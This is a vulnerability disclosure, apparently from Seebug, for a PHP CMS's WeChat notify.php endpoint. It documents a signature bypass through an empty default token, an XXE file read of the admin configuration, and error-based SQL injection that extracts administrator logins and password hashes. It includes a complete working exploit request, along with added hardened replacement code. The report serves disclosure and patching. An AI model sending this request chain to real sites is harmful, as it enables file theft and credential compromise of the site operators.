### Brief description:
As titled. Several issues (signature bypass, XXE, SQL injection) bundled into one report.
### Detailed description:
app/weixin/notify.php
```
$wx=new weixin();
if($wx->check_signature()){
// used by WeChat when the notification URL is (re)configured: echo the challenge back
if(isset($_GET["echostr"])) die($_GET["echostr"]);
// passive reply to messages and events
response_msg();
}
function response_msg(){
global $dbm,$C;
// raw request body, taken as-is from the sender
$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
if(!empty($postStr)){
// parsed with default libxml settings: a DOCTYPE in the body can declare external entities (XXE)
$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
$fromUsername = $postObj->FromUserName;
$toUsername = $postObj->ToUserName;
$time = time();
// reply to text messages
$keyword = trim($postObj->Content);
$textTpl = "<xml>
<ToUserName><![CDATA[%s]]></ToUserName>
<FromUserName><![CDATA[%s]]></FromUserName>
<CreateTime>%s</CreateTime>
<MsgType><![CDATA[%s]]></MsgType>
%s
</xml>";
if(!empty($keyword)){
$msgType = "text";
$contentStr='';
// look up the auto-reply table: $keyword is concatenated into the SQL unescaped (SQL injection)
$rs=$dbm->query("select * from ".TB_PRE."weixin_auto_msg where find_in_set('".$keyword."',msg_key)");
if($rs['error']==''){
.........................
.............................
// the database error text is echoed back to the sender, which enables error-based extraction
$contentStr='<Content><![CDATA['.$rs['error'].']]></Content>';
}
// ToUserName/FromUserName from the request are echoed back, so entity content comes out here too
$resultStr = sprintf($textTpl, $fromUsername, $toUsername, $time, $msgType, $contentStr);
echo $resultStr;
}
}
}
```
A textbook XML external entity (XXE) injection: the raw POST body goes straight into simplexml_load_string() with default libxml settings, and ToUserName from the request is echoed back in the reply, so the contents of an external entity placed there are returned to the sender. On top of that, Content is concatenated unescaped into the find_in_set() query, and the query's error text is echoed back inside <Content>, which is what the error-based SQL injection below relies on.
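A hardened rewrite of response_msg(), added here as an example and not code from the report or from the CMS. It assumes a mysqli connection is passed in, keeps the TB_PRE prefix constant and the msg_key column from the original, and assumes a msg_content column for the reply text; the three fixes are refusing any DOCTYPE before parsing, binding the keyword as a parameter, and logging rather than echoing database errors.

```php
<?php
// Added example, not the CMS's own code: a hardened rewrite of response_msg()
// from app/weixin/notify.php. Assumptions: a mysqli connection is passed in,
// TB_PRE is the table-prefix constant from the original, and the auto-reply
// table has a msg_key column (as in the original) and a msg_content column
// (assumed name for the reply text).

function cdata(string $s): string {
    // A reply value containing "]]>" would otherwise close the CDATA section
    // and let the sender inject XML into the response.
    return '<![CDATA[' . str_replace(']]>', ']]]]><![CDATA[>', $s) . ']]>';
}

function parse_weixin_xml(string $postStr): ?SimpleXMLElement {
    // WeChat pushes never carry a DOCTYPE, and a DOCTYPE is the only place an
    // entity can be declared, so reject it outright instead of trusting flags.
    if (preg_match('/<!DOCTYPE/i', $postStr)) {
        return null;
    }
    if (PHP_VERSION_ID < 80000) {
        // Older PHP/libxml resolve external entities by default; PHP 8 disables it.
        libxml_disable_entity_loader(true);
    }
    $prev = libxml_use_internal_errors(true);
    // LIBXML_NONET blocks network fetches; LIBXML_NOENT is deliberately absent.
    $obj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA | LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    return $obj === false ? null : $obj;
}

function lookup_auto_reply(mysqli $db, string $keyword): ?string {
    // Bound parameter: the keyword never touches the SQL text, so the
    // find_in_set('...',msg_key) break-out from the original is impossible.
    $sql = 'SELECT msg_content FROM ' . TB_PRE . 'weixin_auto_msg WHERE FIND_IN_SET(?, msg_key) LIMIT 1';
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        error_log('weixin auto-reply lookup failed: ' . $db->error); // logged, never echoed
        return null;
    }
    $stmt->bind_param('s', $keyword);
    if (!$stmt->execute()) {
        error_log('weixin auto-reply lookup failed: ' . $stmt->error);
        $stmt->close();
        return null;
    }
    $stmt->bind_result($content);
    $row = $stmt->fetch();
    $stmt->close();
    return $row ? (string)$content : null;
}

function response_msg_hardened(mysqli $db, string $postStr): string {
    if ($postStr === '') {
        return '';
    }
    $postObj = parse_weixin_xml($postStr);
    if ($postObj === null) {
        http_response_code(400);
        return '';
    }
    $fromUsername = (string)$postObj->FromUserName;
    $toUsername   = (string)$postObj->ToUserName;
    $keyword      = trim((string)$postObj->Content);
    if ($keyword === '') {
        return '';
    }
    $reply = lookup_auto_reply($db, $keyword);
    if ($reply === null) {
        return ''; // nothing matched or the query failed: stay silent, leak nothing
    }
    return '<xml>'
        . '<ToUserName>' . cdata($fromUsername) . '</ToUserName>'
        . '<FromUserName>' . cdata($toUsername) . '</FromUserName>'
        . '<CreateTime>' . time() . '</CreateTime>'
        . '<MsgType>' . cdata('text') . '</MsgType>'
        . '<Content>' . cdata($reply) . '</Content>'
        . '</xml>';
}

// Caller ($db is the application's mysqli handle, an assumption). The original's
// $GLOBALS["HTTP_RAW_POST_DATA"] was removed in PHP 7; php://input replaces it.
// echo response_msg_hardened($db, (string)file_get_contents('php://input'));
```

The DOCTYPE check is the load-bearing fix: it does not depend on which libxml version or which entity-loader default the host runs, whereas relying on flags alone leaves older installations exposed. The cdata() helper matters because the reply is built from sender-controlled strings, and a bare `]]>` in one of them would end the CDATA section early.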
Now look at check_signature().
class/weixin.class.php
```
public function check_signature(){
$signature = isset($_GET["signature"])?$_GET["signature"]:'';
$timestamp = isset($_GET["timestamp"])?$_GET["timestamp"]:'';
$nonce = isset($_GET["nonce"])?$_GET["nonce"]:'';
$token = WX_TOKEN;
$tmpArr = array($token, $timestamp, $nonce);
sort($tmpArr,SORT_STRING);
$tmpStr = implode( $tmpArr );
$tmpStr = sha1( $tmpStr );
if( $tmpStr == $signature ){
return true;
}else{
return false;
}
}
```
WX_TOKEN is empty by default. If timestamp and nonce are also omitted from the query string, $tmpArr is three empty strings, implode() yields "", and sha1("") is da39a3ee5e6b4b0d3255bfef95601890afd80709, so the check passes for the following request:
```
/app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709
```
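A hardened replacement for check_signature(), added here as an example and not code from the report or from the CMS. It takes the token as a parameter (the original reads the WX_TOKEN constant), treats the 300-second replay window as an arbitrary choice, and makes $now injectable. Beyond the empty-token problem the report exploits, it also replaces the original's loose `==` on two hex strings, which in PHP compares numeric-looking strings numerically, so two digests of the form `0e<digits>` would compare equal.

```php
<?php
// Added example, not the CMS's own code: a hardened replacement for
// weixin::check_signature(). Assumptions: the token is passed in (the original
// reads the WX_TOKEN constant), $now is injectable for testing, and the
// 300-second replay window is an arbitrary choice.

function check_signature_hardened(
    string $signature, string $timestamp, string $nonce, string $token, ?int $now = null
): bool {
    // With an empty token the signature is sha1 over sorted(timestamp, nonce),
    // computable by anyone; with all three empty it is sha1(''). Refuse to run
    // without a configured secret, and refuse requests missing any input.
    if ($token === '' || $signature === '' || $timestamp === '' || $nonce === '') {
        return false;
    }
    // WeChat sends a Unix timestamp; bound it so a captured URL cannot be
    // replayed indefinitely.
    if (!ctype_digit($timestamp) || abs(($now ?? time()) - (int)$timestamp) > 300) {
        return false;
    }
    $tmpArr = [$token, $timestamp, $nonce];
    sort($tmpArr, SORT_STRING);
    $expected = sha1(implode('', $tmpArr));
    // hash_equals() is a constant-time, strict comparison. The original's == on
    // two hex strings is loose: two digests of the form "0e<digits>" compare equal.
    return hash_equals($expected, strtolower($signature));
}

// What the original computes when WX_TOKEN, timestamp and nonce are all empty:
// the sorted array is three empty strings, so the result is sha1('').
function weak_signature_for_empty_token(): string {
    $tmpArr = ['', '', ''];
    sort($tmpArr, SORT_STRING);
    return sha1(implode('', $tmpArr));
}

// Usage (WX_TOKEN must be set to a non-empty secret for the check to ever pass):
// $ok = check_signature_hardened($_GET['signature'] ?? '', $_GET['timestamp'] ?? '',
//                                $_GET['nonce'] ?? '', WX_TOKEN);
```

The installer should additionally refuse to save an empty WX_TOKEN; the runtime check above is the backstop for installations where it was never set.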
The installer forces the user to change the admin backend path, but that path is stored in www/config/global.php. The XXE gives an arbitrary file read, which recovers it.
Full POST request:
```
POST /app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:
X-Forwarded-For: 127.x'.x.x.1
Connection: keep-alive
Content-Type: text/xml
Content-Length: 377
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/Wamp/www/config/global.php">
]>
<xml>
<ToUserName>&test;</ToUserName>
<Content>123',msg_key) and 1=updatexml(1,concat(0x5c,(select concat(login_name,0x5c,login_pass) from mcms_user where login_level='100')),1)#</Content>
</xml>
```
![1.png](https://images.seebug.org/upload/201501/10100114556f9f0b94ae45d47ba36fcab3b24caa.png)
The injection returns the user data, and the same response carries the file contents; base64-decoding them yields the admin backend path.
![1.png](https://images.seebug.org/upload/201501/10100241971fc23c72c3c7a00e47d950ce9250a5.png)
### Proof of vulnerability:
![1.png](https://images.seebug.org/upload/201501/10100114556f9f0b94ae45d47ba36fcab3b24caa.png)